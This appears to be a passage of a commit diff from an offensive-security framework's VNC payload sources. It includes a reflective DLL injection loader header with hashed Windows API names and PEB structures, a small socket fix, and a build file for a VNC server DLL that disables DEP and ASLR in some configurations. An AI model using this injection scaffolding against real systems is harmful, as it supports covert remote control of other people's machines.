// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
#define EXITFUNC_SEH 0xEA320EFE
#define EXITFUNC_THREAD 0x0A2A1DE0
#define EXITFUNC_PROCESS 0x56A2B5F0
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//

2
external/source/vncdll/winvnc/VSocket.cpp vendored Normal file → Executable file

@ -70,7 +70,7 @@ class VSocket;
////////////////////////////////////////////////////////
// *** Lovely hacks to make Win32 work. Hurrah!
#ifdef __WIN32__
#if defined(__WIN32__) && !defined(EWOULDBLOCK)
#define EWOULDBLOCK WSAEWOULDBLOCK
#endif


473
external/source/vncdll/winvnc/WinVNC.vcxproj vendored Executable file

@ -0,0 +1,473 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectName>winvnc</ProjectName>
<ProjectGuid>{EA6A09AC-04BB-423D-8842-CA48DF901058}</ProjectGuid>
<RootNamespace>WinVNC</RootNamespace>
<SccLocalPath>.</SccLocalPath>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<EmbedManifest>false</EmbedManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<EmbedManifest>false</EmbedManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Midl>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>Win32</TargetEnvironment>
</Midl>
<ClCompile>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<BrowseInformation>true</BrowseInformation>
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0409</Culture>
</ResourceCompile>
<PreLinkEvent>
<Command />
</PreLinkEvent>
<Link>
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
<MapExports>true</MapExports>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>X64</TargetEnvironment>
<GenerateTypeLibrary>false</GenerateTypeLibrary>
<HeaderFileName />
<DllDataFileName />
</Midl>
<ClCompile>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x64__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<BrowseInformation>true</BrowseInformation>
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0409</Culture>
</ResourceCompile>
<PreLinkEvent>
<Command />
</PreLinkEvent>
<Link>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<SuppressStartupBanner>false</SuppressStartupBanner>
<ManifestFile />
<MapExports>false</MapExports>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress />
<DataExecutionPrevention />
<TargetMachine>NotSet</TargetMachine>
<AllowIsolation>true</AllowIsolation>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Midl>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>Win32</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<BufferSecurityCheck>true</BufferSecurityCheck>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0809</Culture>
</ResourceCompile>
<Link>
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention />
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<BufferSecurityCheck>true</BufferSecurityCheck>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0809</Culture>
</ResourceCompile>
<Link>
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention />
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="vncdll.cpp" />
<ClCompile Include="vncEncodeCoRRE.cpp" />
<ClCompile Include="vncEncodeHexT.cpp" />
<ClCompile Include="vncEncoder.cpp" />
<ClCompile Include="vncEncodeRRE.cpp" />
<ClCompile Include="vncEncodeTight.cpp" />
<ClCompile Include="vncEncodeZlib.cpp" />
<ClCompile Include="vncEncodeZlibHex.cpp" />
<ClCompile Include="omnithread\nt.cpp" />
<ClCompile Include="libjpeg\jcapimin.c" />
<ClCompile Include="libjpeg\jcapistd.c" />
<ClCompile Include="libjpeg\jccoefct.c" />
<ClCompile Include="libjpeg\jccolor.c" />
<ClCompile Include="libjpeg\jcdctmgr.c" />
<ClCompile Include="libjpeg\jchuff.c" />
<ClCompile Include="libjpeg\jcinit.c" />
<ClCompile Include="libjpeg\jcmainct.c" />
<ClCompile Include="libjpeg\jcmarker.c" />
<ClCompile Include="libjpeg\jcmaster.c" />
<ClCompile Include="libjpeg\jcomapi.c" />
<ClCompile Include="libjpeg\jcparam.c" />
<ClCompile Include="libjpeg\jcphuff.c" />
<ClCompile Include="libjpeg\jcprepct.c" />
<ClCompile Include="libjpeg\jcsample.c" />
<ClCompile Include="libjpeg\jctrans.c" />
<ClCompile Include="libjpeg\jdapimin.c" />
<ClCompile Include="libjpeg\jdapistd.c" />
<ClCompile Include="libjpeg\jdatadst.c" />
<ClCompile Include="libjpeg\jdatasrc.c" />
<ClCompile Include="libjpeg\jdcoefct.c" />
<ClCompile Include="libjpeg\jdcolor.c" />
<ClCompile Include="libjpeg\jddctmgr.c" />
<ClCompile Include="libjpeg\jdhuff.c" />
<ClCompile Include="libjpeg\jdinput.c" />
<ClCompile Include="libjpeg\jdmainct.c" />
<ClCompile Include="libjpeg\jdmarker.c" />
<ClCompile Include="libjpeg\jdmaster.c" />
<ClCompile Include="libjpeg\jdmerge.c" />
<ClCompile Include="libjpeg\jdphuff.c" />
<ClCompile Include="libjpeg\jdpostct.c" />
<ClCompile Include="libjpeg\jdsample.c" />
<ClCompile Include="libjpeg\jdtrans.c" />
<ClCompile Include="libjpeg\jerror.c" />
<ClCompile Include="libjpeg\jfdctflt.c" />
<ClCompile Include="libjpeg\jfdctfst.c" />
<ClCompile Include="libjpeg\jfdctint.c" />
<ClCompile Include="libjpeg\jidctflt.c" />
<ClCompile Include="libjpeg\jidctfst.c" />
<ClCompile Include="libjpeg\jidctint.c" />
<ClCompile Include="libjpeg\jidctred.c" />
<ClCompile Include="libjpeg\jmemmgr.c" />
<ClCompile Include="libjpeg\jmemnobs.c" />
<ClCompile Include="libjpeg\jquant1.c" />
<ClCompile Include="libjpeg\jquant2.c" />
<ClCompile Include="libjpeg\jutils.c" />
<ClCompile Include="zlib\adler32.c" />
<ClCompile Include="zlib\compress.c" />
<ClCompile Include="zlib\crc32.c" />
<ClCompile Include="zlib\deflate.c" />
<ClCompile Include="zlib\infblock.c" />
<ClCompile Include="zlib\infcodes.c" />
<ClCompile Include="zlib\inffast.c" />
<ClCompile Include="zlib\inflate.c" />
<ClCompile Include="zlib\inftrees.c" />
<ClCompile Include="zlib\infutil.c" />
<ClCompile Include="zlib\maketree.c" />
<ClCompile Include="zlib\trees.c" />
<ClCompile Include="zlib\uncompr.c" />
<ClCompile Include="zlib\zutil.c" />
<ClCompile Include="d3des.c" />
<ClCompile Include="DynamicFn.cpp" />
<ClCompile Include="FileTransferItemInfo.cpp" />
<ClCompile Include="MinMax.cpp" />
<ClCompile Include="RectList.cpp" />
<ClCompile Include="stdhdrs.cpp" />
<ClCompile Include="tableinitcmtemplate.cpp">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="tableinittctemplate.cpp">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="tabletranstemplate.cpp">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="translate.cpp" />
<ClCompile Include="TsSessions.cpp" />
<ClCompile Include="VideoDriver.cpp" />
<ClCompile Include="vncauth.c" />
<ClCompile Include="vncBuffer.cpp" />
<ClCompile Include="vncClient.cpp" />
<ClCompile Include="vncDesktop.cpp" />
<ClCompile Include="vncInstHandler.cpp" />
<ClCompile Include="vncKeymap.cpp" />
<ClCompile Include="vncRegion.cpp" />
<ClCompile Include="vncServer.cpp" />
<ClCompile Include="vncService.cpp" />
<ClCompile Include="vncSockConnect.cpp" />
<ClCompile Include="VSocket.cpp" />
<ClCompile Include="WallpaperUtils.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="omnithread\nt.h" />
<ClInclude Include="omnithread\omnithread.h" />
<ClInclude Include="common.h" />
<ClInclude Include="libjpeg\jchuff.h" />
<ClInclude Include="libjpeg\jconfig.h" />
<ClInclude Include="libjpeg\jdct.h" />
<ClInclude Include="libjpeg\jdhuff.h" />
<ClInclude Include="libjpeg\jerror.h" />
<ClInclude Include="libjpeg\jinclude.h" />
<ClInclude Include="libjpeg\jmemsys.h" />
<ClInclude Include="libjpeg\jmorecfg.h" />
<ClInclude Include="libjpeg\jpegint.h" />
<ClInclude Include="libjpeg\jpeglib.h" />
<ClInclude Include="libjpeg\jversion.h" />
<ClInclude Include="zlib\deflate.h" />
